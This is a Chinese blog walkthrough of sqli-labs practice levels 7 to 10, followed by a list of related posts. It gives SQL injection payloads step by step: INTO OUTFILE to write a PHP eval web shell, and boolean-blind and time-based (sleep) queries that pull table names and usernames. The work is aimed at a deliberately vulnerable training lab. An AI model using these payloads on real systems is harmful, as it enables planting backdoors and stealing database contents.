sqli-labs-less(7-10)学习

最新推荐文章于 2022-07-08 12:11:26 发布
最新推荐文章于 2022-07-08 12:11:26 发布
阅读量4.4k 收藏 1
点赞数
文章标签: 学习 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59416598/article/details/123693710
版权

Less7

本关的提示为outfile,那么通关语句应该为select xxx into outfile xxx

函数select xxx into outfile

select ... into outfile '文件路径\文件名'或者select ... into outfile '文件路径//文件名'

该语句能够把表数据导出到文本文件中,并且用load data file恢复数据

使用该函数的条件

1对应的权限

用户具有的权限可以通过查询参数secure_file_priv知道

当该参数的值为NULL时,禁止导入导出功能

当值为一个指定高低目录时,只能向指定的目录导入导出

当值为空时,说明对导入导出没有限制

2要知道路径

可以通过@@datadir回显得到(一般情况很难拿到,本关通过前几关可以获取路径)

3·没有对单引号” ‘ “进行过滤

该函数的路径不能用十六进制等方式(这里可以用到另一个函数dumpoutfile)

4·对web的目录具有读权限

payload:

?id=-1' union select 1,@@secure_file_priv,@@datadir%23 这里是在第一关拿到权限和路径

?id=1')) union select 1,2,'<?php @eval($_POST['x'])?>' into outfile "文件路径\x.php"

这句话的意思是将我们的木马语句导出到指定目录下的x.php文件中,注意这里浏览器会报错,不过文件是能够写入的,我们直接通过网站路径去访问x.php并且传入参数x='注入语句'即可(也可以用webshell工具链接)

Less8

常规思路

1·判断注入点

?id=-1 发现网站回显异常,可能存在注入

2·判断干扰

?id=1'        发现报错,说明是'闭合
?id=1'%23     依然报错,可能有括号
?id=1')%23    报错,继续加括号
?id=1'))%23   回显成功

3·猜列数并判断回显

使用order by 和 union select函数,发现没有回显(ps:如果这里有回显直接常规注入)

4·报错注入

使用updatexml等函数进行报错注入,发现网站没有返回报错语句(本关的源码中将报错语句注释了)

5·布尔盲注或延时盲注

那么第九关和第十关就是布尔盲注和延时盲注的练习了

先介绍几个函数

length() 判断括号中数据的长度

sleep() 可以延迟网站回显的时间

substr(x,1,1) 截取数据x的第一个值,第一个1是说明从第一个值开始,第二个1是截取的值数

if(x,1,2) 如果函数x为真,返回1,为假,返回2 

count() 统计数量

通过将上述函数组合即可得到payload

1· and length(database())=1    当数据库名的长度为1时网站回显正常,否则回显错误

2·and substr(database(),1,1)='s'  当数据库的第一个值为s时回显正常

3·select count(table_name) from information_shcema.tables where table_schema = database() 统计表的数量

1·判断数据库中表的数量

?id=1' and (select count(table_name) from information_schema.tables where table_schema = database())=4%23

2·判断每个表的长度

?id=1' and (select length(table_name) from information_schema.tables where table_schema =database() limit 0,1)=6%23

这里用limit来选择表,如用limit 2,1限定第三张表

3·判断每个表的表名

?id=1' and substr((select table_name from information_schema.tables where table_schema = database() limit 0,1),1,1)='e'%23

事实上这里用ascii()函数将截取的值转换成ASCII码后再通过二分法可以快速查找到值(脚本思路)

4·判断表中的字段数(即列数)

payload和上述函数差不多

5·判断每个列的长度

6·判断每个列的列名

7·爆数据


?id=1' and (select length(username) from users where id=1)=4%23判断字段长度

?id=1' and substr((select username from users limit 0,1),1,1)="D"%23判断数据名

Less9

本关加入字符闭合以及正常注入回显一直正常

所以只能尝试延时注入,通过网站回显的时间判断

?id=1' and sleep(5)%23 发现网站回显时间延长了说明存在注入

注入语句

?Id=1' and if(语句,sleep(5),1)%23

?Id=1' and if(length(databse())=8,sleep(5),1)%23数据库名长度为8即延迟5秒返回

其它同第八关的思路

Less10

本关同样是回显没有任何改变,所以使用延时注入,只不过干扰为双引号

无忧aa
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs靶场Less-7
songling515010475的专栏
08-21 329
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
sqlilabs—less7
一个普普通通的博客
03-24 2559
sqlilabs—less7
SQLi LABS Less-7 布尔盲注
wangyuxiang946的博客
04-01 1万+
SQLi 第七关,sqli-labs less-7,sqlilabs less 7
sqli-labs(less7)
m0_68980215的博客
07-08 245
sql-lab lesson7
Sqli-labs之Less-7
→_→
03-26 1610
Less-7 GET - 导入文件- 字符串 分析数字型/字符型及单/双引号注入: 我们可以分别尝试将 ?id=1 ?id=1' ?id=1"添加到url中,进行测试,发现?id=1'报错,初步判断为字符型注入,经过测试后发现正常返回 You are in.... U...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
PHP、Apache 环境中部署 sqli...sqli-labs 是一个非常有用的工具,帮助用户学习和实践 SQL 注入的技术。通过部署 sqli-labs,用户可以在 PHP 和 Apache 环境中实践 SQL 注入的技术,从而提高自己的安全意识和防御能力。
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
sqli-lab教程 less-7,8
xiaoyuhensuai的博客
07-08 284
查找原SQL语句:$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"在我们输入:?id=1时会显示“You are in.... Use outfile......”,从中发现在这一关中没有报错我们所需的内容。所有在这一关中我们要使用“布尔盲注”此时我们就需要使用“select length(database())”显示当前数据名字的长度和“select substr(database(),1,1)”显示当前熟即名字的第一个字母。对数据库长度进行推
sql注入 sql-lib Less -7
weixin_43745072的博客
11-20 655
Less-7 首先,这一关的要求是使用文件进行攻击 判断注入情况,此时两个情况输出是不同的,所以可以断定,这个时候存在注入点。 ?id=1')) and 1=1# ?id=1')) and 1=2# 看提示,本关要求的是使用文件注入,也就是我们要在网站创建后门进行攻击。可以考虑into outfile写入文件中 攻击载荷,注意:$_POST要大写 '<?php @eval($_POST["mima"])?>' into outfile "F:\\phpStudy\\WWW\\
sql注入】Less5-7详解
lyy0xfff的博客
07-13 880
SQL注入Less-5Less-6Less-7 Less-5 0x00 首先根据题意我们输入参数id=1,和id=-1看看页面的回显情况 我们发现当它执行的SQL语句正确时,页面返回You are in,当sql语句执行不正确时,返回为空,且并没有回显位置,这就是我们所说的盲注,具体什么时盲注可以看我之前的文章基于布尔类型、时间类型的盲注 0x01 Less-6 Less-7 ...
sqli-lab教程Less-7
Brucye
03-23 464
Less-7 将一句话木马写入目录中,使用中国菜刀连接,拿到shell。 1.开启写入权限 使用show variables like '%secure%'在MySQL命令行中判断 show variables like '%secure%'; 如果这里为Null就没有写入权限 2.如何修改本地写入权限 通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。 secure_file_priv="/" 再次查看此参数,若参数值不为 null 则修改成功。 3
sqli-labs (less7-less8) & 菜刀用法
Xi4or0uji
07-25 1006
less 7 outfile&amp;菜刀用法 这关没什么好说的,主要讲讲菜刀用法 首先还是先讲一下这关好吧 ?id=1'会报错,?id=1"则说you are in...use outfile.... 后台语句是$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1"; 所以用?id=1'))--+是可以闭合的,重点不是这里,题目...
7.sqli-labs-Less7
qwsn
03-29 1784
Less 7 GET-Dump into outfile-String 1、根据提示:是把字段值写入一个可以输出的文本+字符串类型注入 ①、找闭合类型(看源码) ②、查看目录结构(使用第一关的@@basedir或者@@datadir,或者直接看靶机吧) 2、一直回显查You are in… Use outfile…,很难找出闭合类型; ①看Less7的index.php下的源码:SELECT * ...
SQL中的 substr(X,Y,Z) 或 substr(X,Y) 函数
hmyqwe的博客
10-08 476
substr(X,Y,Z) 或 substr(X,Y) 函数; X是要截取的字符串; Y是字符串的起始位置(注意第一个字符的位置为1,不为0),取值范围是±(1~length(X)),当Y等于length(X)时,截取最后一个字符;当Y等于负整数-n时,从倒数第n个字符处截取; Z是要截取字符串的长度,取值范围是正整数;若Z省略,则从Y处一直截取到字符串末尾;若Z大于剩下的字符串长度,截取到字符串末尾为止; ...
substr函数用法详解
热门推荐
qq646748739的专栏
04-22 7万+
substr(string, start):从string的start位置开始提取字符串  length:要提取字符串的长度,若length为以下任意条件之一时,返回start位置到串尾的所有字符: length不指定  length为空  length为负数 length大于start到串尾的长度 例如: data test;  str='chsh234960b3';  s
sqli-labs-less-7
最新发布
09-26
sqli-labs less-7是一个web注入实验,它是用来学习SQL注入的。在这个实验中,我们需要使用不同的注入技术来绕过应用程序的安全措施,并从数据库中获取敏感信息。在这个具体的题目中,我们需要使用UNION SELECT语句来实现注入。 根据引用和引用提供的信息,我们可以得出以下步骤: 1. 构造注入语句:在URL参数中使用单引号来闭合原始查询,然后使用UNION SELECT语句来执行额外的SQL查询。在这个例子中,注入语句是?id=-1')) union select 1,user(),database()。 2. 将查询结果导出到文件中:使用INTO OUTFILE语句将注入的查询结果导出到指定的文件路径。在这个例子中,查询的结果将被导出到文件"E:\\phpStudy_64\\phpstudy_pro\\WWW\\sqlilabs\\Less-7\\1.txt"中。 通过这些步骤,我们可以成功执行SQL注入攻击,并将查询结果保存到指定的文件中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值